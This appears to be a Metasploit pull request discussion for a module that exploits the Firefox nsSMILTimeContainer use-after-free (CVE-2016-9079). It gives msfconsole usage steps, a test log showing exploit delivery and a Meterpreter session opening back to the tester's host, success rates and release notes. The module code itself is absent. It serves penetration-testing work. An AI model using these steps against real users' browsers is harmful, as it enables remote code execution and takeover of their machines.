Firefox nsSMILTimeContainer::NotifyTimeChange() rce (CVE 2016-9079)

[wwebb-r7]

This exploits the use after free condition targeted by the leaked Tor Browser Bundle exploit originally located here. This module was created by reversing and porting the leaked exploit to target vanilla Firefox on Windows, which uses jemalloc and can be more reliably exploited than TBB with it's current allocator.

The module currently supports Firefox releases from approximately 38-41. I intend to add support for more releases in the future (other people are welcome to contribute) but I just wanted to get it out there for now. I'm also fine with changing the module ranking if need be, since it's sort of confusing as to what category it'd fall in.

It must be said that this wouldn't have been completed in any reasonable amount of time without the support from and hard work of a certain individual. You deserve all the credit.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/browser/firefox_smil_uaf
• set payload [PREFERRED PAYLOAD]
• set [PAYLOAD OPTIONS]
• OPTIONAL set UsePostHTML true see note at bottom
• run
• You should get something like this:
  
• Verify it works

100% reliability is not possible, though it should be close. If it doesn't work, rinse and repeat.

• I included an option titled UsePostHTML that will render whatever page you like on the target after exploit completion. It's mentioned in the module doc, but if you want to test it out, edit $datadirectory/exploits/firefox_smil_uaf/post.html - the included example is probably of no use to anyone.

[wchen-r7]

Hi @wwebb-r7, excellent work! What version of FF did you test it on during development? Thanks.

[wwebb-r7]

38.0 in particular, but I have a lot more installations. I'll try to get a list together of each version I've verified it on.

[wchen-r7]

Thanks. I will test this on 38.0.

[wwebb-r7]

Confirmed working on my end: 38.0 39.0 40.0 41.0. I didn't test any minor releases in between those.

42.0+ will be soon.

[wchen-r7]

This woks for me:

msf exploit(firefox_smil_uaf) > [*] Using URL: http://192.168.146.1:8080/86zTw11
[*] Server started.
[*] 192.168.146.177  firefox_smil_uaf - Got request: /86zTw11
[*] 192.168.146.177  firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
[*] 192.168.146.177  firefox_smil_uaf - Sending exploit HTML ...
[*] 192.168.146.177  firefox_smil_uaf - Got request: /86zTw11/worker.js
[*] 192.168.146.177  firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
[*] 192.168.146.177  firefox_smil_uaf - Sending worker thread Javascript ...
[*] Sending stage (957487 bytes) to 192.168.146.177
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.177:49263) at 2017-01-23 11:48:53 -0600
[*] Session ID 1 (192.168.146.1:4444 -> 192.168.146.177:49263) processing InitialAutoRunScript 'migrate -f'
[*] Running module against WIN-6NH0Q8CJQVM
[*] Current server process: firefox.exe (2660)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2780

I tested 10 times. And it was 50% successful:

1. Hangs
2. Crash
3. Successful
4. Crash
5. Hangs
6. Hangs
7. Successful
8. Successful
9. Successful
10. Successful

Sometimes it would hang, I'm not sure if was because I didn't wait long enough or it was just a hit and miss type of thing.

[wchen-r7]

Release Notes

The firefox_smil_uaf module exploits a vulnerability found in Mozilla Firefox. It exploits an out of bounds indexing/use-after-free condition in nsSMILTimeContainer::NotifyTimeChange(), which allows arbitrary code execution under the context of the user.

[wwebb-r7]

A hang of a few seconds will occur on some runs. I'm getting much better reliability with smaller payloads that aren't as busy as meterpreter, and a few ideas as to why that might be. I'll look into it.